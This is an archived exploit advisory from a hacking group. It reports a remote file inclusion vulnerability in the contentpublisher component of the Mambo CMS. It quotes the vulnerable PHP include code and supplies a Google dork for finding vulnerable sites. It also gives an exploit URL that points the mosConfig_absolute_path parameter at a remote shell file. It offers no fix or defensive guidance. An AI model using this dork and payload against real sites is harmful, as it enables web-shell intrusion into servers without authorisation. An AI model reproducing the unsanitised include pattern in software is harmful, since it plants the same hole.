AOH :: HP Unsorted C :: B06-4338.HTM

contentpublisher Mambo Component Remote File Include Vulnerabilities



contentpublisher Mambo Component Remote File Include Vulnerabilities
contentpublisher Mambo Component Remote File Include Vulnerabilities



!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------

Title : contentpublisher Mambo Component Remote File Include Vulnerabilities

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: crackers_child@sibersavascilar.com

--------------------------------------------------------------------------------

Google Dorks  : inurl:"/com_contentpublisher/"

------------------------- -------------------------------------------------------

Application :  contentpublisher/  Component of Mambo

--------------------------------------------------------------------------------

Bug İn contentpublisher.php

global $my, $mosConfig_live_site, $mosConfig_lang;

if (file_exists($mosConfig_absolute_path.'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.php')) {
    include($mosConfig_absolute_path.'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.php');
} else {
    include($mosConfig_absolute_path.'/components/com_contentpublisher/languages/english.php');
}

--------------------------------------------------------------------------------

Exploit:

http://[target]/[mambo_path]/components/contentpublisher/contentpublisher.php?mosConfig_absolute_path=Shell.txt?

--------------------------------------------------------------------------------

greets:

All My Friends And SiberSavascilar.Com Members !

--------------------------------------------------------------------------------


--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------



The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.